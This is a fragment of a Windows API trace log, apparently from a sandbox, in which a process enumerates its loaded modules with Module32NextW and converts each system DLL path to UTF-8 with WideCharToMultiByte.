	[0105.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\ActXPrxy.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\ActXPrxy.dll", lpUsedDefaultChar=0x0) returned 33
	[0105.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ActXPrxy.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ActXPrxy.dll", lpUsedDefaultChar=0x0) returned 13
	[0105.363] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.364] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\biwinrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\biwinrt.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.364] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="biwinrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="biwinrt.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.364] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.365] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\WindowsApps\\Microsoft.Messaging_1.10.22012.0_x86__8wekyb3d8bbwe\\SkyWrap.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\WindowsApps\\Microsoft.Messaging_1.10.22012.0_x86__8wekyb3d8bbwe\\SkyWrap.dll", lpUsedDefaultChar=0x0) returned 93
	[0105.365] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkyWrap.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkyWrap.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.365] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.366] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\WS2_32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\WS2_32.dll", lpUsedDefaultChar=0x0) returned 31
	[0105.366] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WS2_32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WS2_32.dll", lpUsedDefaultChar=0x0) returned 11
	[0105.366] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\MFPlat.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\MFPlat.DLL", lpUsedDefaultChar=0x0) returned 31
	[0105.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MFPlat.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MFPlat.DLL", lpUsedDefaultChar=0x0) returned 11
	[0105.367] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.369] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\cfgmgr32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\cfgmgr32.dll", lpUsedDefaultChar=0x0) returned 33
	[0105.369] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cfgmgr32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cfgmgr32.dll", lpUsedDefaultChar=0x0) returned 13
	[0105.369] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\advapi32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\advapi32.dll", lpUsedDefaultChar=0x0) returned 33
	[0105.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="advapi32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="advapi32.dll", lpUsedDefaultChar=0x0) returned 13
	[0105.370] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\Windows.Networking.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\Windows.Networking.dll", lpUsedDefaultChar=0x0) returned 43
	[0105.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows.Networking.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows.Networking.dll", lpUsedDefaultChar=0x0) returned 23
	[0105.371] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\FirewallAPI.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\FirewallAPI.dll", lpUsedDefaultChar=0x0) returned 36
	[0105.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirewallAPI.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirewallAPI.dll", lpUsedDefaultChar=0x0) returned 16
	[0105.373] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.374] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\MMDevAPI.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\MMDevAPI.DLL", lpUsedDefaultChar=0x0) returned 33
	[0105.374] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MMDevAPI.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MMDevAPI.DLL", lpUsedDefaultChar=0x0) returned 13
	[0105.374] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\MFReadWrite.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\MFReadWrite.dll", lpUsedDefaultChar=0x0) returned 36
	[0105.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MFReadWrite.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MFReadWrite.dll", lpUsedDefaultChar=0x0) returned 16
	[0105.375] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\d3d11.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\d3d11.dll", lpUsedDefaultChar=0x0) returned 30
	[0105.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="d3d11.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d3d11.dll", lpUsedDefaultChar=0x0) returned 10
	[0105.393] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\Windows.Networking.Connectivity.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\Windows.Networking.Connectivity.dll", lpUsedDefaultChar=0x0) returned 56
	[0105.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows.Networking.Connectivity.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows.Networking.Connectivity.dll", lpUsedDefaultChar=0x0) returned 36
	[0105.396] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\Windows.Networking.HostName.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\Windows.Networking.HostName.dll", lpUsedDefaultChar=0x0) returned 52
	[0105.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows.Networking.HostName.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows.Networking.HostName.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.397] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\DEVOBJ.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\DEVOBJ.dll", lpUsedDefaultChar=0x0) returned 31
	[0105.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEVOBJ.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DEVOBJ.dll", lpUsedDefaultChar=0x0) returned 11
	[0105.398] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\PROPSYS.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\PROPSYS.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROPSYS.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROPSYS.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.399] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.400] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\dxgi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\dxgi.dll", lpUsedDefaultChar=0x0) returned 29
	[0105.400] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dxgi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dxgi.dll", lpUsedDefaultChar=0x0) returned 9
	[0105.400] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\RTWorkQ.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\RTWorkQ.DLL", lpUsedDefaultChar=0x0) returned 32
	[0105.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RTWorkQ.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RTWorkQ.DLL", lpUsedDefaultChar=0x0) returned 12
	[0105.401] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\fwbase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\fwbase.dll", lpUsedDefaultChar=0x0) returned 31
	[0105.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fwbase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fwbase.dll", lpUsedDefaultChar=0x0) returned 11
	[0105.403] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.404] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\Windows.ApplicationModel.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\Windows.ApplicationModel.dll", lpUsedDefaultChar=0x0) returned 49
	[0105.404] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows.ApplicationModel.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows.ApplicationModel.dll", lpUsedDefaultChar=0x0) returned 29
	[0105.404] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\windows.storage.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\windows.storage.dll", lpUsedDefaultChar=0x0) returned 40
	[0105.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="windows.storage.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows.storage.dll", lpUsedDefaultChar=0x0) returned 20
	[0105.405] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.407] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\shlwapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\shlwapi.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.407] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="shlwapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="shlwapi.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.407] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.408] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\powrprof.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\powrprof.dll", lpUsedDefaultChar=0x0) returned 33
	[0105.408] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="powrprof.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powrprof.dll", lpUsedDefaultChar=0x0) returned 13
	[0105.408] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\profapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\profapi.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="profapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="profapi.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.409] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\Windows.Storage.ApplicationData.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\Windows.Storage.ApplicationData.dll", lpUsedDefaultChar=0x0) returned 56
	[0105.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows.Storage.ApplicationData.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows.Storage.ApplicationData.dll", lpUsedDefaultChar=0x0) returned 36
	[0105.410] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.412] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\iertutil.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\iertutil.dll", lpUsedDefaultChar=0x0) returned 33
	[0105.412] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="iertutil.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="iertutil.dll", lpUsedDefaultChar=0x0) returned 13
	[0105.412] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\threadpoolwinrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\threadpoolwinrt.dll", lpUsedDefaultChar=0x0) returned 40
	[0105.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="threadpoolwinrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="threadpoolwinrt.dll", lpUsedDefaultChar=0x0) returned 20
	[0105.413] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\AVRT.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\AVRT.dll", lpUsedDefaultChar=0x0) returned 29
	[0105.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AVRT.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AVRT.dll", lpUsedDefaultChar=0x0) returned 9
	[0105.416] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\logoncli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\logoncli.dll", lpUsedDefaultChar=0x0) returned 33
	[0105.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="logoncli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="logoncli.dll", lpUsedDefaultChar=0x0) returned 13
	[0105.417] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\Windows.ApplicationModel.Background.TimeBroker.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\Windows.ApplicationModel.Background.TimeBroker.dll", lpUsedDefaultChar=0x0) returned 71
	[0105.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows.ApplicationModel.Background.TimeBroker.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows.ApplicationModel.Background.TimeBroker.dll", lpUsedDefaultChar=0x0) returned 51
	[0105.419] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\Windows.ApplicationModel.Background.SystemEventsBroker.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\Windows.ApplicationModel.Background.SystemEventsBroker.dll", lpUsedDefaultChar=0x0) returned 79
	[0105.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows.ApplicationModel.Background.SystemEventsBroker.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows.ApplicationModel.Background.SystemEventsBroker.dll", lpUsedDefaultChar=0x0) returned 59
	[0105.420] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\Windows.Security.Authentication.OnlineId.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\Windows.Security.Authentication.OnlineId.dll", lpUsedDefaultChar=0x0) returned 65
	[0105.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows.Security.Authentication.OnlineId.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows.Security.Authentication.OnlineId.dll", lpUsedDefaultChar=0x0) returned 45
	[0105.421] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.423] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\Windows.Globalization.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\Windows.Globalization.dll", lpUsedDefaultChar=0x0) returned 46
	[0105.423] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows.Globalization.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows.Globalization.dll", lpUsedDefaultChar=0x0) returned 26
	[0105.423] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\Bcp47Langs.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\Bcp47Langs.dll", lpUsedDefaultChar=0x0) returned 35
	[0105.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bcp47Langs.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Bcp47Langs.dll", lpUsedDefaultChar=0x0) returned 15
	[0105.424] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.426] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\VoipRT.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\VoipRT.dll", lpUsedDefaultChar=0x0) returned 31
	[0105.426] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VoipRT.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VoipRT.dll", lpUsedDefaultChar=0x0) returned 11
	[0105.426] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
